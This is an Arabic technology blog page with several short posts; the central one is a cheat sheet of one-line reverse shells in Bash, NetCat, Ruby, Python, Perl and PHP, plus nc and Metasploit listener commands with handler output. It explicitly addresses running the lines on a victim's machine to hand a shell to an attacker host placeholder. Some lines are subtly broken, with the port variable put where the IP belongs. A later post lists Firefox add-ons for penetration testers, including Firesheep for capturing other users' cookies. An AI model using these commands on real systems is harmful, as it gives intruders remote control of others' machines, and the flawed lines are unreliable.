موقع المحترف للمعلوميات عبارة عن مدونة تضم عدد كبير من المواضيع في شتى مجالات التقنية والإعلاميات في قالب مقالات ،نتطرق فيها إلى مختلف المواضيع القريبة من الشباب العربي ، هذا الأخير الذي نهدف إلى تطوير مهاراته وزيادة معارفه فيما يخص تكنولوجيا الإعلاميات . مدونة  المحترف للمعلوميات تأسست سنة 2012 حيث تستقطب الآن عدد لابأس به من الزوار من كافة ربوع الوطن العربي ، و مقرها الرئيسي بالمغرب ومديرها عبد الحكيم الحماني، ويندوز ، لينكس ، فيديو  ، انترنت ، اخبار' name='keywords'/> <meta content='internet,gratuit,طريقة الربح من الانترنت,احصل على دومين مجاني,انترنت,سيرفر,الفيس بوك,imedia,للمعلوميات,pes 2013,المحترف,mobilezone,جديد موبيل زون 2013,ماستر كارد

برنامج Copy Handler هو برنامج اخر جيد لنقل الملفات علي جهازك وتسريع عملية النقل. ويمكنك استكمال وايقاف النقل. فواجهه البرنامج بسيطة الاستخدام وتحتوي علي المعلومات والبيانات الاساسية اثناء عملية النقل فالبرنامج يقوم بتسريع عملية النقل 6-7 اضعاف.  ( تحميل البرنامج )
تابع القراءة Résuméabuiyad

انشاء اتصال عكسي من سطر واحد وبعدة لغات

17:11 | | | 0تعليقات

هذه معاني المتغيرات التي ستجدها في الشرح. استبدلها عند التطبيق.
$ATTCKER_IP: هو عنواد المهاجم
$ATTACKER_PORT: هو المنفذ الذي ينصت عليه الضحية
$VICTIM_IP: هو عنواد المهاجم
$VICTIM_PORT: هو المنفذ الذي ينصت عليه الضحية

Listining

تستطيع الإنصات بأي طريقة تحبها
- NetCat
nc -lvp $ATTACKER_PORT
أو
ncat -lvp $ATTACKER_PORT
- Metasploit
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=$ATTCKER_IP LPORT=$ATTACKER_PORT E
PAYLOAD =&gt; windows/shell/reverse_tcp
LHOST =&gt; $ATTCKER_IP
LPORT =&gt; $ATTCKER_PORT
[*] Started reverse handler on $ATTCKER_IP:$ATTCKER_PORT
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to $VICTIM_IP
[*] Command shell session 1 opened ($ATTCKER_IP:$ATTCKER_PORT -&gt; $VICTIM_IP:47657) at 2013-03-15 06:51:17 -0500

Reverse connection

طبعا كل ما سيطبق هنا هو على جهاز الضحية.
إذا كان جهاز الضحية ويندوز سنستبدل “/bin/bash” أو “/bin/sh” بـ cmd.exe

Bash
bash -i &gt;&amp; /dev/tcp/$ATTCKER_IP/$ATTCKER_PORT 0&gt;&amp;1

NetCat
nc -nvv $ATTCKER_IP $ATTCKER_PORT -e /bin/bash
أو
nc -c /bin/sh $ATTCKER_IP $ATTCKER_PORT

Ruby
ruby -r socket -e ' f=TCPSocket.open("$ATTCKER_IP",$ATTCKER_PORT).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'

Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTCKER_PORT",$ATTCKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl
perl -e 'use Socket;$i="$ATTCKER_PORT";$p=$ATTCKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))) {open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/bash -i");};'

Php
php -r '$sock=fsockopen("$ATTACKER_IP",$ATTACKER_PORT);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'

تابع القراءة Résuméabuiyad

إضافات Firefox مميزة لمختبري الإختراق

17:03 | | | 0تعليقات

 

Mozilla-Firefox-add-ons1
متصفح Firefox هو واحد من أشهر متصفحات الإنترنت و يتم الإعتماد عليه من قبل الكثير من المستخدمين حول العالم و اهم ما يميز متصفح فايرفوكس انه يدعم نظام الإضافات ( Addons ) حيث يتوفر له الآلاف من الأضافات المجانية التي تساعد و تعزز من اداء المتصفح و إمكانياته بشكل كبير ,كما ان المتصفح يستخدمه الكثير من مختبري الإختراق أو الـ Penetration Testers و من المعروف ان مختبر الإختراق دائما ما يحتاج إلى ادوات تساعدة في اداء عمله
في هذة المقالة سوف نحاول ان نستعرض اهم إضافات Firefox التي تفيد مختبري الإختراق و التي تسهل و وتوفر الكثير من الوقت و المجهود و التي لا استطيع انا شخصياً الإستنغاء عنها :)
sqlinjectme SQL Inject ME
اضافة مفيدة تساعد على إختبار و الكشف عن ثغرات Sql Injection في التطبيقات عن طريق إختبار جميع المدخلات بالصفحة (Forms) و التحقق في حاله حدوث خطاء يدل على وجود ثغرة من نوع Sql Injection
Live HTTP Headerslivehttpheaders
إضافة جميلة جداً تساعد على إلتقاط جميع الـ Http Headers عند زياره صفحة كالـ Sniffer مع امكانية إعادة إرسال الطلب مرة اخرى و التعديل على الـ Headers المرسلة مثل Referer ,Cookies او POST Data و غيرهم
Wappalyzerwapplayzer
إضافة قوية للغاية و في رأي إضافة لا يمكن الأستغناء عنها ابداً فهي اضافة تساعد على عمل Fingerprinting للكثير من الاشياء كنوع و إصدار خادم الويب و نظام التشغيل الخاص بالسيرفر و التقنيات المستخدمة في انشاء و برمجة الموقع مع امكانية التعرف بشكل تلاقئ و سريع على تطبيق الويب المستخدم مثل WordPress , Joomla , Opencart , Roundcube و غيرهم الكثير .
XSS-Mesqlinjectme
اضافة مشابة لنفس فكرة اضافة Sql Inject Me لكن هذة الأضافة تقوم بإختبار تطبيق الويب للثغرات من نوع Cross Site Scripting او XSS من خلال تجربة الكثير من Xss Payloads و التحقق في حاله وجود ثغرة .
User Agent Switcheruseragent
اضافة سهله و مفيدة تقوم بتغير نوع المتصفح او الـ Useragent و التي قد تكون مفيدة احياناً عند عند الحاجة لإختبار تطبيق الويب الذي يعمل على اجهزة الموبايل و ليس على المتصفحات العادية فمن الممكن عن طريق هذة الأضافة تزيف نوع المتصفح عندما يحاول التعرف عليه الخادم .
Firesheep firesheep
إضافة شهيرة و معروفة لدى الكثير الأن و هي تعمل بالظبط كـ Packet Sniffer للتجسس على الشبكات و التقاط معلومات Cookies المرسلة من خلال الأجهزة المتصلة على الشبكة و التى تفيد بعد ذلك مختبر الإختراق في الحصول على معلومات المستخدمين
FlagFoxflagfox
إضافة جميلة و مفيدة تعمل مباشرة عند زيارة صفحة الموقع و تساعد بالحصول على معلومات مثلا IP address الخاص بالخادم و اسم و علم الدولة الموجود فيها الخادم عن طريق الـ GEOIP
Tamper Data tamperdata
إضافة مشابة لإضافة الـ Live Http Headers و قد تكون أسهل من ناحية الإستخدام حيث تساعد على التقاط الـ http requests المرسلة للخادم مع امكانية التعديل عليها بنفس الحظة
Leet Keytamperdata
إضافة مفيدة تساعد مختبر الإختراق على التشفير و فك التشفير لكثير من انواع التشفير مثل BASE64 , URL BIN , ENCODE , HEX و كل ذلك بإستخدام إختصارات للكيبورد مباشرة من المتصفح و بطريقة سهله للغاية
Elite Proxy Switcherelite
إضافة بسيطة تساعد على تفعيل و تعديل اعدادات الـبروكسي او تعطيلها بضغطة ماوس مباشر بشكل سريع دون الحاجة لعملها من اعدادات المتصفح التقليدية .
HackBarhackbar
إضافة بسيطة ومبرمجة خصيصاً لمختبري الإختراق حتى تساعد على إختبار ثغرات Sql Injections و Xss و المساعدة على كتابة الإستعلامات الخاصة بحقن قواعد البينات بشكل سريع مثلا Union Select و استخدام انواع التشفير المختلفة مثل MySQL CHAR و MD5 و غيرها .
و إلى هنا قد نكون ذكرنا و استعرضنا أهم إضافات المتصفح المفيدة لمختبري الإختراق و التي تعمل بشكل تلاقئ و سريع دون الحاجة لإستخدام ادوات منفصلة لعمل ذلك , و لكن بالطبع قد لا تكون هذة هي كل الإضافات الموجودة و المتوفرة لمختبري الإختراق فلذلك اذا كان لديك اقتراح على إضافات أخرى مفيدة ارجو إعلامي بذلك حتى يتم إضافاتها للقائمة :)
تابع القراءة Résuméabuiyad

جميع الحقوق محفوظة ©2013